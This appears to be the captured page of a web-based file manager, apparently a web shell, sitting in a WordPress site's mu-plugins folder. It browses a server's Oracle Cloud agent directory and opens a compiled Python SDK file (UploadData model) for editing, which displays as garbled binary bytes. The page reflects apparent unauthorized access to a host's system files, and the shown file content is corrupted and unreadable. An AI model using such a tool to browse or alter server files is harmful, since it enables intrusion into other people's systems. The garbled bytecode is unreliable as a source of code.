📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
service_catalog
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/service_catalog/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: upload_data.pyc
a O��fu � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s~ e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z d d� Z dd� Zdd� ZdS )� UploadDatazD The model for uploaded binary data, like logos and images. c K s2 dddd�| _ dddd�| _d| _d| _d| _dS )ag Initializes a new UploadData object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param display_name: The value to assign to the display_name property of this UploadData. :type display_name: str :param content_url: The value to assign to the content_url property of this UploadData. :type content_url: str :param mime_type: The value to assign to the mime_type property of this UploadData. :type mime_type: str �str)�display_name�content_url� mime_type�displayName� contentUrl�mimeTypeN)� swagger_types� attribute_map� _display_name�_content_url� _mime_type)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/service_catalog/models/upload_data.py�__init__ s ��zUploadData.__init__c C s | j S )z� Gets the display_name of this UploadData. The name used to refer to the uploaded data. :return: The display_name of this UploadData. :rtype: str �r �r r r r r 2 s zUploadData.display_namec C s || _ dS )z� Sets the display_name of this UploadData. The name used to refer to the uploaded data. :param display_name: The display_name of this UploadData. :type: str Nr )r r r r r r >